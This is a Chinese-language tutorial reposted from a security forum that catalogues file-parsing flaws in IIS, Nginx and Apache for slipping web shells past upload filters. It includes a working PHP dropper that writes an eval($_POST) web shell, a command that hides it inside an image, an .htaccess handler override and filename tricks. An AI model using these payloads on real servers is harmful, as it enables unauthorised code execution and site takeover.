各類解析漏洞

IIS6.0解析漏洞


目錄解析:/xx.asp/xx.jpg  xx.jpg可替換爲任意文本文件(e.g. xx.txt),文本內容爲後門代碼
後綴解析: /xx.asa;.jpg (此處需要抓包修改文件名)
IIS6.0 都會把 此類 後綴文件成功解析爲 asp文件
默認解析: /xx.asa  /xx.cer  /xx.cdx
IIS6.0 默認的可執行文件出了asp 還包含這三種
此處可聯繫利用目錄解析漏洞  /xx.asa/xx.jpg 活 /xx0cer/xx.jpg 或 xx.asa;.jpg



IIS 7.0/IIS 7.5/Nginx <8.03 解析漏洞


在默認Fast-CGI開啓在默認Fast-CGI開啓狀況下,在一個文件路徑(/xx.jpg)後面加上/xx.php會將 /xx.jpg/xx.php 解析爲 php 文件。
常用利用方法: 將一張圖和一個寫入後門代碼的文本文件合併 將惡意文本寫入圖片的二進制代碼之後,避免破壞圖片文件頭和尾
e.g.   
copy xx.jpg/b + yy.txt/a xy.jpg              /b 即二進制[binary]模式              /a 即ascii模式 xx.jpg正常圖片文件      yy.txt內容

[PHP] 純文本查看 複製代碼

?

1
<?php fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?


其他可利用的解析漏洞


在windows環境下,xx.jpg[空格] 或xx.jpg. 這兩類文件都是不允許存在的,若這樣命名,windows會默認除去空格或點,這也是可以被利用的!
在向一臺windows主機上傳數據時,你可以抓包修改文件名,在後面加個空格或點,試圖繞過黑名單,若上傳成功,最後的點或空格都會被消除,這樣就可得到shell。
我記得Fck Php 2.6就存在加空格繞過的漏洞。{Linux主機中不行,Linux允許這類文件存在}
如果在Apache中.htaccess可被執行(默認不執行,這是90sec裏的一位朋友說的,當初我並不知道),且可以被上傳,
那可以嘗試在.htaccess中寫入:
<FilesMatch “shell.jpg”> SetHandler application/x-httpd-php </FilesMatch>
shell.jpg換成你上傳的文件,這樣shell.jpg就可解析爲php文件



Nginx <8.03解析漏洞


在Fast-CGI關閉的情況下,Nginx <8.03依然存在解析漏洞
在一個文件路徑(/xx.jpg)後面加上%00.php會將 /xx.jpg%00.php 解析爲 php 文件。


Apache解析漏洞


後綴解析:test.php.x1.x2.x3
Apache將從右至左開始判斷後綴,若x3非可識別後綴,再判斷x2,直到找到可識別後綴爲止,然後將該可識別後綴進解析
test.php.x1.x2.x3 則會被解析爲php
經驗之談:php|php3|phtml 多可被Apache解析


轉載於i春秋:http://bbs.ichunqiu.com/thread-10773-1-1.html

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章